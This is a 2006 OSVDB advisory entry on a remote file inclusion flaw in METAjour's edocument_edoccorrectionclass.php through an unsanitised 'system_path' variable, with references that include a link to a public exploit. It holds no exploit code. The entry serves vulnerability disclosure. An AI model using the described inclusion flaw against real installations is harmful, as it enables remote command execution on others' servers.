METAjour edocument_edoccorrectionclass.php system_path Variable Remote File Inclusion

2006-05-31T00:00:00
ID OSVDB:39472
Type osvdb
Reporter OSVDB
Modified 2006-05-31T00:00:00

Description

Vulnerability Description

METAjour contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'edocument_edoccorrectionclass.php' not properly sanitizing user input supplied to the 'system_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

References:

Vendor URL: http://www.metajour.org/ Secunia Advisory ID:20404 Related OSVDB ID: 39476 Related OSVDB ID: 39473 Related OSVDB ID: 1018364 Related OSVDB ID: 1018370 Related OSVDB ID: 1018375 Related OSVDB ID: 1018376 Related OSVDB ID: 1018377 Related OSVDB ID: 1018379 Related OSVDB ID: 1018382 Related OSVDB ID: 1018383 Related OSVDB ID: 1018385 Related OSVDB ID: 1018390 Related OSVDB ID: 1018393 Related OSVDB ID: 1018402 Related OSVDB ID: 1018403 Related OSVDB ID: 1018405 Related OSVDB ID: 1018406 Related OSVDB ID: 1018408 Related OSVDB ID: 1018411 Related OSVDB ID: 1018412 Related OSVDB ID: 1018418 Related OSVDB ID: 1018424 Related OSVDB ID: 1018426 Related OSVDB ID: 1018428 Related OSVDB ID: 1018429 Related OSVDB ID: 1018430 Related OSVDB ID: 1018431 Related OSVDB ID: 1018432 Related OSVDB ID: 1018363 Related OSVDB ID: 1018366 Related OSVDB ID: 1018367 Related OSVDB ID: 1018368 Related OSVDB ID: 1018388 Related OSVDB ID: 1018389 Related OSVDB ID: 1018395 Related OSVDB ID: 1018398 Related OSVDB ID: 1018399 Related OSVDB ID: 1018400 Related OSVDB ID: 1018401 Related OSVDB ID: 1018404 Related OSVDB ID: 1018413 Related OSVDB ID: 1018416 Related OSVDB ID: 1018425 Related OSVDB ID: 1018427 Related OSVDB ID: 39475 Related OSVDB ID: 1018365 Related OSVDB ID: 1018369 Related OSVDB ID: 1018371 Related OSVDB ID: 1018372 Related OSVDB ID: 1018378 Related OSVDB ID: 1018386 Related OSVDB ID: 1018391 Related OSVDB ID: 1018397 Related OSVDB ID: 1018415 Related OSVDB ID: 1018417 Related OSVDB ID: 1018419 Related OSVDB ID: 39480 Related OSVDB ID: 39474 Related OSVDB ID: 39472 Related OSVDB ID: 1018362 Related OSVDB ID: 1018373 Related OSVDB ID: 1018374 Related OSVDB ID: 1018380 Related OSVDB ID: 1018381 Related OSVDB ID: 1018384 Related OSVDB ID: 1018387 Related OSVDB ID: 1018392 Related OSVDB ID: 1018394 Related OSVDB ID: 1018396 Related OSVDB ID: 1018407 Related OSVDB ID: 1018409 Related OSVDB ID: 1018410 Related OSVDB ID: 1018414 Related OSVDB ID: 1018420 Related OSVDB ID: 1018421 Related OSVDB ID: 1018422 Related OSVDB ID: 1018423 Generic Exploit URL: http://milw0rm.com/exploits/1855 FrSIRT Advisory: ADV-2006-2077 CVE-2006-2768 Bugtraq ID: 18211